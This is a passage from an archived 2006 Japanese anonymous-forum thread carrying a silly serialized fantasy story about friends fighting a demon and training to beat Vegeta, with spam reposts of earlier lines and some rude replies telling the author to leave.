その瞬間沙紀が悲鳴をあげる




今度は沙紀がやられてしまった…





ヒラメ「ダメだ…今の俺には勝てない…っていうか闘う土俵が違うんだ」




鮎「わー!!!!!!!!」





鮎までがやられてしまった

320 :ユーは名無しネ:2006/08/31(木) 02:38:25
悪魔「マダヤルノカ…」




ヒラメ「鮎も…ストロベリーも…沙紀も…返しやがれー!!!!!」






悪魔「ツギハオマエノバンカ」




ヒラメ「やれるもんならやってみろ…俺は絶対負けない」




悪魔「フフフ」




ヒラメ「うわああああ!!!!!!!!」

321 :ユーは名無しネ:2006/08/31(木) 02:43:03
河合「待ちな!」




ヒラメ「河合…!」




河合「うぃーす」



悪魔「ソイツカライコウカ」





河合「はいよっ」





悪魔「ウ〜………」




ヒラメ「悪魔が苦しんでる?」





河合「オッケィ!あとちょっとかな」





ヒラメ「?????」





ヒラメには何が起きてるのかわからない

322 :ユーは名無しネ:2006/08/31(木) 02:44:28
〜今晩一旦終了〜

323 :ユーは名無しネ:2006/08/31(木) 02:51:05
再開






ストロベリー「私のも白いカンフー系の帽子がついてます!」











河合「なんかオシャレだね」








マヨ「似合ってるよ」








ヒラメ「何気に地上まで飛び降りれそうな気がするんだ」









ヒューーーーー


324 :ユーは名無しネ:2006/08/31(木) 02:51:47
出たベジータ






4人は蒸発していない









ヒラメ「やるぞ!」











マヨ「俺は2コ下に友達いるからそいつ呼ぼうか?」














鮎「俺は同級に友達いるからソイシ呼ぼうか?」













河合「俺もLightって知り合いいるんだけど連れてこようか?」


325 :ユーは名無しネ:2006/08/31(木) 02:52:39
ストロベリィ「ありがとうございます!嬉しい!」









ヒラメ「お前は俺の隣の斜め後ろにいつもいろよ」









ストロベリィ「はい!黄色雲に乗れるかしら…」






ヒラメ「えーと…今日から仲間になるストロベリー君です」










ストロベリー「あっ…」








3人「!!!!!!」









3人「(気のせいだ…他人の空似だ)」


326 :ユーは名無しネ:2006/08/31(木) 02:54:01
ヒラメ「ダメだ…今の俺には勝てない…っていうか闘う土俵が違うんだ」







ヒラメ「ダメだ…今の俺には勝てない…っていうか闘う土俵が違うんだ」








沙紀「どうにか…びっくりした…」












鮎「ヒラメ〜起きなよ〜」











ヒラメ「最終目標はベジータだ」


327 :ユーは名無しネ:2006/08/31(木) 02:56:00
悪魔「ウ〜………」








ストロベリー「どうする?次の衣装アイテムがダサかったら」








沙紀「……あぁそっか…家じゃないんだった」









ヒラメ「ストロベリー…オマイが来る時もそうやってみんなワクワクしてたよ」

328 :ユーは名無しネ:2006/08/31(木) 03:19:45
なぜこのスレに来るorz
もっと他にスレ沢山あるジャマイカorz

329 :ユーは名無しネ:2006/08/31(木) 03:39:43
>328
胸に手を当てて貴様のやってる事を聞いてみるんだな

330 :ユーは名無しネ:2006/08/31(木) 03:40:57
悪魔「カーッカカカ」









鮎「うわぁ…嫌な空気」









ストロベリー「オマイらの朝飯食っちまうぞー」











ヒラメ「加入者は責任持って俺が連れてくる」


331 :ユーは名無しネ:2006/08/31(木) 03:42:05
>329
ココでの話がつまらないからかorz

332 :ユーは名無しネ:2006/08/31(木) 04:35:09
黙れ屑

333 :ユーは名無しネ:2006/08/31(木) 13:23:57
その時河合が合図の様に指を鳴らした




パチッ





ドカーーーン!!!!!!!





爆風と共に粉々に消えていく悪魔






ヒラメ「あぁ…スゲェ…なんなんだ」




一瞬にして消えていく世界






ヒラメ「何が起きたんだ…」

334 :ユーは名無しネ:2006/08/31(木) 13:30:03
ストロベリー鮎沙紀を連れて黄色雲で降りる事にした




河合「みんな完全に意識を失ってる」




ヒラメ「魔法や薬草では効かないのか?」






河合「自然に起きるのを待つのが無難だとオモ」





ヒラメ「確かにそうだな…河合…今回はオマイのおかげだ」






河合「相手が悪魔だったからね…体力じゃキツイけど魔法でいける相手だったから」

335 :ユーは名無しネ:2006/08/31(木) 13:36:02
それから2日経った



ストロベリー「アルェー(・3・此処は何処だYO!)





ヒラメ「意識が戻ったか!」




ストロベリー「????」





鮎「あ〜………頭痛い…」






ヒラメ「鮎!!!!大丈夫か!」







沙紀「う〜ん…悪魔は…?」






ヒラメ「オマイら!!!!よかったーーー」

336 :ユーは名無しネ:2006/08/31(木) 13:44:19
鮎「俺…悪魔が近付いてきて…それで…」




ヒラメ「大丈夫だよっ」



鮎「悪魔は?」



ヒラメ「終わったんだ…河合が来て危機を救ってくれた」




鮎「そっかぁ〜よかった〜」





沙紀「なにが何だかわからない…悪魔の顔…見た?」






鮎「……?そういえば見たのに記憶にない…」





ヒラメ「!!!どんな顔だったっけ…」





ストロベリー「ぜってーブサだって」






なぜかみんな悪魔の顔を覚えていなかった

337 :ユーは名無しネ:2006/08/31(木) 13:54:09
ピー(無線)


河合「こちら河合」



ヒラメ「なぁ!悪魔の顔ってどんなだった??」




河合「顔は……無かった…てゆーか姿が無かった」





鮎「は?見たもん!顔も見たのに記憶がないんだ」





ストロベリー「いいじゃん終わった事だし」





沙紀「なんか気持ち悪いね」




ヒラメ「姿が無いって…あったよな?」





河合「なんていうか邪悪な意識の集まりっていうか…」






皆は河合の話が腑に落ちないまま旅を続ける事にした


338 :ユーは名無しネ:2006/08/31(木) 14:10:08
マヨ「女なら旅も楽しいな」









河合「う〜ん…」











ストロベリー「改革をとめるなっっ!」













3人「(気のせいだ…他人の空似だ)」


















ストロベリー「あわわわわ…よ…よろしくっっ」



339 :ユーは名無しネ:2006/08/31(木) 14:10:55
マヨ「かわいーっっ!」











河合「呼んだ?」














ヒラメ「え〜じゃない!〇〇塔のテッペンにはレベルアップアイテムがある」

















ストロベリー「いや…私の事かと」


340 :ユーは名無しネ:2006/08/31(木) 14:11:35




ヒラメ「お前は俺の隣の斜め後ろにいつもいろよ」









ストロベリィ「はい!黄色雲に乗れるかしら…」






ヒラメ「えーと…今日から仲間になるストロベリー君です」












河合「顔は……無かった…てゆーか姿が無かった」









鮎「は?見たもん!顔も見たのに記憶がないんだ」



341 :ユーは名無しネ:2006/08/31(木) 14:19:28
ストロベリー「ヒラメ沙紀!しっかり登れよ?」










沙紀「崖が崩れそう…」









ヒラメ「鮎も…ストロベリーも…沙紀も…返しやがれー!!!!!」
















今度は沙紀がやられてしまった…















ストロベリー「どうする?次の衣装アイテムがダサかったら」



342 :ユーは名無しネ:2006/08/31(木) 15:12:11
ヒラメ「セカーク5人になったが何やら外部から文句が聞こえている」



マヨ「俺抜けるわ」



343 :ユーは名無しネ:2006/08/31(木) 15:13:07
アレルギー体質だからたまに玉袋や足や肛門が湿疹出来ることがあるの






ストロベリー「無線だ」








ストロベリー「全く関係ないヤシラだよ」



ヒラメ「先日迄俺達と一緒に闘った大切な仲間だよ」













その時はステロイド軟膏塗ってます


344 :ユーは名無しネ:2006/08/31(木) 16:22:31
ストロベリィ「ありがとうございます!嬉しい!」







マヨ「俺は2コ下に友達いるからそいつ呼ぼうか?」












ヒラメ「鮎も…ストロベリーも…沙紀も…返しやがれー!!!!!」






悪魔「ツギハオマエノバンカ」


345 :ユーは名無しネ:2006/08/31(木) 17:23:54
ヒラメ「いいかオマイら…当初の予定が大幅に狂っている…」



3人「…………」





ヒラメ「本来900近くあった余裕があと700程度となってしまった…」




ストロベリー「どういう事?」





ヒラメ「時間制限じゃないがあと700の間に俺達はベジータを倒さなくてはならない」






ストロベリー「イミフ」





鮎「700…まだまだ余裕あるじゃん?」






ヒラメ「バカヤロー!!!甘い事言ってんじゃねー!700なんてあっという間だ!」

346 :ユーは名無しネ:2006/08/31(木) 17:27:50
ヒラメ「いいか!今夜は衣装アイテムを手に入れるぞ!鮎の衣装だ!」





鮎「リョ〜カイ〜!!!」




沙紀「沙紀の衣装は?」





ヒラメ「オマイはベジータと闘うわけじゃないからそのままでイイ」





ストロベリー「鮎の衣装どんなのになるだろうね」






ヒラメ「俺の衣装より良かったら交換だぞ(w」




鮎「絶対やだ!!!」

347 :ユーは名無しネ:2006/08/31(木) 17:40:21
その夜



ヒラメ「不気味だなぁ…夜は」




鮎「どこに衣装があるの?」




ヒラメ「洞窟だ…」




沙紀「怖いなぁ…」





ヒラメ「大丈夫だ!洞窟の中には小さい敵が沢山いるがたいした事はない」






ストロベリー「ヒラメは鮎の衣装どんなのかもう知ってるの?」




ヒラメ「それはワカラナス」

348 :ユーは名無しネ:2006/08/31(木) 18:04:02
ヒラメ「ここか…真っ暗だな」




鮎「俺の笑顔で明るくなるから(w」





ヒラメ「ノンキだな全く…」



ストロベリー「なんか…音がする…」





沙紀「洞窟の中から」



ヒラメ「出たな!〇〇!!!」





鮎「かかってこい!!」



敵〇〇は数は多いがたいしたことはない為すぐに倒す事ができた


349 :ユーは名無しネ:2006/08/31(木) 18:07:39
沙紀「あの箱の中に…??」




鮎「やったー!!!!開けよ開けよ!!!」




ヒラメ「どんなの?どんなの?」




パカッ…





箱から出てきたのは青と赤のハッピと黒いズボンと白い長い布が3枚であった…


350 :ユーは名無しネ:2006/08/31(木) 18:13:32
鮎「青いハッピと黒いズボンは俺のだよね?」



ヒラメ「鮎!ハッピを羽織れ!!!白い布で締めろ!そしてもう一枚の白い布は頭に巻け!!」





鮎「よっしゃああああ!!!!!」




ストロベリー「なんでぃ!祭衣装じゃねーか」





ヒラメ「ひがまない(wひがまない(w」




ストロベリー「赤は沙紀の?」





ヒラメ「違うな…これは持って帰ろう…何かの役に立つかもしれない」

351 :ユーは名無しネ:2006/08/31(木) 18:36:16
河合「待ちな!」

















ヒラメ「河合…!」











河合「うぃーす」











悪魔「ソイツカライコウカ」


352 :ユーは名無しネ:2006/08/31(木) 18:36:51
ヒラメ「いいか!今夜は衣装アイテムを手に入れるぞ!鮎の衣装だ!」





鮎「リョ〜カイ〜!!!」




沙紀「沙紀の衣装は?」





ヒラメ「オマイはベジータと闘うわけじゃないからそのままでイイ」





ストロベリー「鮎の衣装どんなのになるだろうね」






ヒラメ「俺の衣装より良かったら交換だぞ(w」


353 :ユーは名無しネ:2006/08/31(木) 18:39:26
ヒラメ「寝るのも一苦労だ」


マヨ「当番制で見張りしようよ」





鮎「え〜〜〜〜〜」






河合「う〜ん…」







マヨ「(言うんじゃなかったorz)」







マヨ「確かにそれもそうだな」






ストロベリィ「みんなは名前なんていうの?」


354 :ユーは名無しネ:2006/08/31(木) 18:39:59
それから2日経った



ストロベリー「アルェー(・3・此処は何処だYO!)





ヒラメ「意識が戻ったか!」




ストロベリー「????」




パチッ





ドカーーーン!!!!!!!





爆風と共に粉々に消えていく悪魔






ヒラメ「あぁ…スゲェ…なんなんだ」


355 :ユーは名無しネ:2006/08/31(木) 18:42:11
マヨ「俺は2コ下に友達いるからそいつ呼ぼうか?」














鮎「俺は同級に友達いるからソイシ呼ぼうか?」






悪魔「ツギハオマエノバンカ」




ヒラメ「やれるもんならやってみろ…俺は絶対負けない」




悪魔「フフフ」




ヒラメ「うわああああ!!!!!!!!」


356 :ユーは名無しネ:2006/08/31(木) 18:57:52
ヒラメ「なんか微妙に俺の衣装スーパー〇リオ入ってない?」





スーパー「いや…そのものだよね(w」





ヒラメ「鮎はやっぱカコイイな…衣装似合いすぎだ」





鮎「いや〜変な衣装じゃなくてホントヨカタよ」





ストロベリー「沙紀は衣装がねえな」





ヒラメ「オマイそーゆう事言うヤシは強制脱退だからな」





ストロベリー「スミマセンスミマセン」

357 :ユーは名無しネ:2006/08/31(木) 19:07:06
鮎「もぅ夜があけちゃうよ…」




ヒラメ「一睡もできなかったな…今夜は闘いはやめとこう」





ストロベリー「ヤター━━━(゚∀゚)━━━!!」




ヒラメ「ヤター(゚∀゚)!…までは許すが回るなよ…?」




ストロベリー「はい!」




ヒラメ「俺達が万が一ベジータに負けたらどうなるんだろう」




鮎「あっ…確かに」





ストロベリー「オマイら!!!何甘い事言ってんだ!!!!そんな事言っててやる気あるのか!!!」








ヒラメ「ウゼーよ」




358 :ユーは名無しネ:2006/08/31(木) 19:21:56
鮎「負けるって事はイコール…」



ピー(無線)


(マヨ)「テメーらヌルイ事言ってんなよ…その星を守る為に行ったんじゃないのか?」





ヒラメ「確かにそうだ…この星の皆の為に俺達は絶対勝たなくちゃいけない」






ストロベリー「なんかマンドクセーな」






沙紀「沙紀は何もしてあげられてない気がする…」

359 :ユーは名無しネ:2006/08/31(木) 19:29:06
そして数時間後


ヒラメ「鮎…ストロベリー…今沙紀は自分が役に立ててないと落ち込んでいる」





鮎「そんな事ないのに…」





ヒラメ「沙紀がいるおかげで俺達は健康を保ててるわけだ」






ストロベリー「でもさー河合だったら一瞬で豪華な料理出すよ?」






ヒラメ「そーゆうひとことがイクナイ!!」





鮎「でも沙紀ちゃんの料理はあたたかさがあるよね」







ストロベリー「河合のだって温かかったよ…冷御飯なんか出た事ないし…アツアツの出来立てだよ」









360 :ユーは名無しネ:2006/08/31(木) 19:36:21
ヒラメ「まあ俺から一度沙紀に話してみる」




ストロベリー「私が行きましょうか」





ヒラメ「イラネ」




鮎「何か俺達で沙紀ちゃんにしてあげられる事ないかな」






ヒラメ「いや…何もしない方がいい…アイシは戦闘能力の低さに悩んでるんだ」





鮎「河合の代わりになれてないって?」





ヒラメ「そんな感じだな」






361 :ユーは名無しネ:2006/08/31(木) 19:41:11
一旦終了

362 :ユーは名無しネ:2006/08/31(木) 19:42:32
再開


ストロベリー「はい!」








ヒラメ「え〜じゃない!〇〇塔のテッペンにはレベルアップアイテムがある」












鮎「は?見たもん!顔も見たのに記憶がないんだ」

















河合「なんていうか邪悪な意識の集まりっていうか…」








沙紀「どうにか…びっくりした…」


363 :ユーは名無しネ:2006/08/31(木) 19:43:30
悪魔「ソイツカライコウカ」










ヒラメ「そこに辿り着く迄これから大変だと思う」










鮎「楽しみだね」









ヒラメ「ただ…黄色い雲に乗れるかと…」













沙紀「明日のオニギリ」





364 :ユーは名無しネ:2006/08/31(木) 19:44:31
鮎&河合&マヨ「え〜〜〜〜〜」







ストロベリー「いや…私の事かと」













ヒラメ「マジかよ…」












ストロベリィ「はい!黄色雲に乗れるかしら…」








365 :ユーは名無しネ:2006/08/31(木) 19:45:37
ヒラメ「ヤター(゚∀゚)!…までは許すが回るなよ…?」







ストロベリー「でもさー河合だったら一瞬で豪華な料理出すよ?」






ストロベリィ「みんなは名前なんていうの?」












ヒラメ「鮎!ハッピを羽織れ!!!白い布で締めろ!そしてもう一枚の白い布は頭に巻け!!」















鮎「リョ〜カイ〜!!!」








366 :ユーは名無しネ:2006/08/31(木) 19:49:05
ヒラメ「意識が戻ったか!」




ストロベリー「????」




ストロベリー「鮎の衣装どんなのになるだろうね」




ヒラメ「ひがまない(wひがまない(w」




沙紀「洞窟の中から」




鮎「700…まだまだ余裕あるじゃん?」

367 :ユーは名無しネ:2006/08/31(木) 20:32:53
ヒラメ「ちょっと沙紀と黄色雲で出掛けてくるわ」




沙紀「行ってきまぁす」



鮎ストロベリー「いってらっしゃい」





鮎「ねぇストロベリー…要はアレだよね…ベジータのギャリック砲を止められたら助かるよね?」








ストロベリー「ハッ!ベジータのギャリック砲を止めるなんざ身の程を知れって話だよな」








鮎「そうかな?力合わせれば勝てると思うよ?」







ストロベリー「何を根拠に勝てるとか言えるわけ?」

368 :ユーは名無しネ:2006/08/31(木) 20:36:49
ストロベリー「はい!」








ヒラメ「え〜じゃない!〇〇塔のテッペンにはレベルアップアイテムがある」












鮎「は?見たもん!顔も見たのに記憶がないんだ」

















河合「なんていうか邪悪な意識の集まりっていうか…」








沙紀「どうにか…びっくりした…」


369 :ユーは名無しネ:2006/08/31(木) 20:37:56
ストロベリー「私が行きましょうか」








鮎「あっ…確かに」










ヒラメ「うわああああ!!!!!!!!」
















ストロベリー「鮎の衣装どんなのになるだろうね」





370 :ユーは名無しネ:2006/08/31(木) 20:40:42
鮎「わからないけど…」



ストロベリー「俺達にはギャリック砲を止めるだけの力が必要なんだよ」





鮎「そうだよね」





ストロベリー「勝てるか勝てないかは努力と運次第だ」





鮎「修業が必要かな」




ストロベリー「そうだね…」




鮎「正義は勝つから!絶対!」






ストロベリー「俺は小悪魔だけどね(w」





こうして今日一日はみんな休んだ

371 :ユーは名無しネ:2006/08/31(木) 20:49:26
そして今夜も沙紀の手料理を美味しくいただく3人であった




ヒラメ「明日は流れ星を受け止める修業に行く」





ストロベリー「いってらっさい」





ヒラメ「オマイも行くんだよ!!!!ウマシカ!!」






鮎「マジでー???」





ヒラメ「沙紀も多少は修業しといた方がいいから連れていくぞ」





沙紀「はい!」






ヒラメ「薬草は必ず持っていく事!いいな!」




鮎ストロベリー沙紀「はい!」

372 :ユーは名無しネ:2006/08/31(木) 20:51:57

鮎ストロベリー「いってらっしゃい」






ヒラメ「鮎…ストロベリー…今沙紀は自分が役に立ててないと落ち込んでいる」








ストロベリィ「みんなは名前なんていうの?」










鮎「青いハッピと黒いズボンは俺のだよね?」




373 :ユーは名無しネ:2006/08/31(木) 20:55:14
そして毎日毎日流れ星を受け止める修業をした





ヒラメ「ダメだ…早いしデカい…」





鮎「俺も一回かすっただけだよorz」




ヒラメ「河合なら指一本だろうな」




ストロベリー「名案を思いつきますた!!!」




ヒラメ「なんだ?」





ストロベリー「河合一人に行かせたら良いと思います」




ヒラメ「残念ながらベジータに魔法は通じない」


374 :ユーは名無しネ:2006/08/31(木) 20:58:51
沙紀「なんとか…けどキツイね結構…」




高校の頃自習室でよくしてた。4つの机が風車状に




小便漏れたような気がしたのでトイレを借りた




沙紀「どうなっちゃうの…」

ストロベリー「沙紀は今の可愛い服の方がイイとオモ」





マヨ「どうして黄色雲使わないの?宝の持ち腐れだよ」









375 :ユーは名無しネ:2006/08/31(木) 21:00:04
鮎「え〜〜〜〜〜」




ストロベリー「改革をとめるなっっ!」





3人「…………」





河合「なんか俺の友達のLightとえらく被るんだよね…」





出たベジータ




鮎「今は楽しく食べようよ」
4人は蒸発していない

376 :ユーは名無しネ:2006/08/31(木) 21:00:20
約1ヶ月間修業した成果もあり4人は流れ星を受け止める事にジョジョに成功し始めた






ヒラメ「楽しーな!!!」





鮎「できんじゃーん!俺達!」





沙紀「楽し〜!!」





ストロベリー「指一本で受け止められるぜ!!」




ヒラメ「すげー!!!俺達ちゃんと強くなってるね!」




4人の戦闘能力はかなりアップしていた



377 :ユーは名無しネ:2006/08/31(木) 21:01:52
ストロベリー「はい!」





鮎「何か俺達で沙紀ちゃんにしてあげられる事ないかな」





ストロベリー「なんかマンドクセーな」





ヒラメ「一睡もできなかったな…今夜は闘いはやめとこう」






ヒラメ「あぁ…スゲェ…なんなんだ」






鮎「リョ〜カイ〜!!!」




378 :ユーは名無しネ:2006/08/31(木) 21:05:21
河合「なんていうか邪悪な意識の集まりっていうか…」






鮎「ねぇストロベリー…要はアレだよね…ベジータのギャリック砲を止められたら助かるよね?」






鮎「修業が必要かな」







ストロベリィ「みんなは名前なんていうの?」





ヒラメ「そーゆうひとことがイクナイ!!」






ストロベリー「スミマセンスミマセン」







マヨ「(言うんじゃなかったorz)」




379 :ユーは名無しネ:2006/08/31(木) 21:06:05
ストロベリー「見て見てー!!!」




小指一本で星を持つストロベリー





鮎「なんか今の時点でベジータに勝てる気がする」





ヒラメ「まだまだだ!ベジータに勝つ為にはまだまだ修業がいる」





沙紀「けど絶対勝てる気がする!」





ヒラメ「その気持ちが大切だ」





ストロベリー「マヨと河合もビクーリだろうな」

380 :ユーは名無しネ:2006/08/31(木) 21:08:41
ヒラメ「なんだ?」






鮎「修業が必要かな」






ヒラメ「鮎!ハッピを羽織れ!!!白い布で締めろ!そしてもう一枚の白い布は頭に巻け!!」







河合「なんていうか邪悪な意識の集まりっていうか…」







鮎「やったー!!!!開けよ開けよ!!!」







沙紀「沙紀の衣装は?」




381 :ユーは名無しネ:2006/08/31(木) 21:10:32
ストロベリー「ありがとうございます!」





だから、宴会芸で公衆の面前ですぐ裸になったり、場合によってはチンポ





ストロベリー鮎「えー」





マヨ「貸せよ…俺宛のラブレだ」





鮎「ヒラメ日本国憲法知らないだろ」



382 :ユーは名無しネ:2006/08/31(木) 21:11:32
マヨ「あれくらいどうって事ないよ」




河合「どうして?」





鮎「あ〜あ………やっちゃったね〜」





ヒラメ「アイシらが登ってきてからだ」





ストロベリー「はいっ!」




383 :ユーは名無しネ:2006/08/31(木) 21:11:51
ヒラメ「よし!今夜は宴会だー!!!!」





ストロベリー「ヤタ━━━(゚∀゚)━━━!!!!」





ヒラメ「ジュースと菓子と料理で盛り上がっていくぞ!!」





沙紀「リョーカイ!!」




鮎「合言葉は!!?」




ヒラメ「ヤーヤー…」ストロベリー「ギャリッ…」沙紀「え???」






鮎「揃ってねぇ…orz」

384 :ユーは名無しネ:2006/08/31(木) 21:15:30
ヒラメ「一睡もできなかったな…今夜は闘いはやめとこう」




鮎「正義は勝つから!絶対!」





ストロベリー「何を根拠に勝てるとか言えるわけ?」




鮎&河合&マヨ「え〜〜〜〜〜」





鮎「負けるって事はイコール…」





マヨ「確かにそれもそうだな」




スーパー「いや…そのものだよね(w」



385 :ユーは名無しネ:2006/08/31(木) 21:19:42
夜…宴会で盛り上がっている




ストロベリー「歌いまーす!」




3人から盛大な拍手を貰うストロベリー





ストロベリー「♪オッナイ♪囁く声でねだって〜♪」



ヒラメ「カッケーストロベリー!!!!!」






鮎ヒラメ「歌いまーす!」





ストロベリー沙紀「イェーイ!!!!」





鮎ヒラメ「♪ただこどものフリで〜恋をして〜♪」




ストロベリー「最高ー!!!!」




すっかり楽しんだ4人であった

386 :ユーは名無しネ:2006/08/31(木) 21:20:37
そして毎日毎日流れ星を受け止める修業をした





ヒラメ「ダメだ…早いしデカい…」




ヒラメ「薬草は必ず持っていく事!いいな!」




鮎ストロベリー沙紀「はい!」




鮎ストロベリー「いってらっしゃい」






ヒラメ「鮎…ストロベリー…今沙紀は自分が役に立ててないと落ち込んでいる」



387 :ユーは名無しネ:2006/08/31(木) 21:21:08
ヒラメ「ヤター(゚∀゚)!…までは許すが回るなよ…?」







ストロベリー「でもさー河合だったら一瞬で豪華な料理出すよ?」




河合「なんていうか邪悪な意識の集まりっていうか…」








沙紀「どうにか…びっくりした…」






ヒラメ「鮎…ストロベリー…今沙紀は自分が役に立ててないと落ち込んでいる」



388 :ユーは名無しネ:2006/08/31(木) 21:24:03
ヒラメ「ヨは満足じゃ」




ストロベリー「楽しかった〜」



鮎「もう動きたくない〜」



沙紀「今日はこのまま寝ちゃう?」




ヒラメ「だね〜」



一同爆睡

389 :ユーは名無しネ:2006/08/31(木) 21:24:59
一旦終了します

390 :ユーは名無しネ:2006/08/31(木) 21:25:49
>389
誰も見てねーよ氏ね
二度と書き込むな氏ね

391 :ユーは名無しネ:2006/08/31(木) 21:26:41
そんなに嫌か?

392 :ユーは名無しネ:2006/08/31(木) 21:26:43
沙紀「リョーカイ!!」
     


鮎「修業が必要かな」




ストロベリー「マヨと河合もビクーリだろうな」

393 :ユーは名無しネ:2006/08/31(木) 21:27:27
>391
氏ねや通報してやるからな

394 :ユーは名無しネ:2006/08/31(木) 21:28:34
>393
わかったよ

もうこのスレには書かないよ

395 :ユーは名無しネ:2006/08/31(木) 21:29:30
>394
どのスレにも書くな
氏んでろ

396 :ユーは名無しネ:2006/08/31(木) 21:48:43
>395
わかったよ…


ROM専に戻ります

397 :ユーは名無しネ:2006/08/31(木) 21:57:13
>396
嘘つくなボケ
壷から消えろ
二度とくんな

398 :ユーは名無しネ:2006/11/22(水) 05:01:41
べじーた

399 :ユーは名無しネ:2006/11/23(木) 17:28:30
次の人>400だよ〜(^ω^)

400 :ユーは名無しネ:2006/11/24(金) 07:46:57
400

143 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)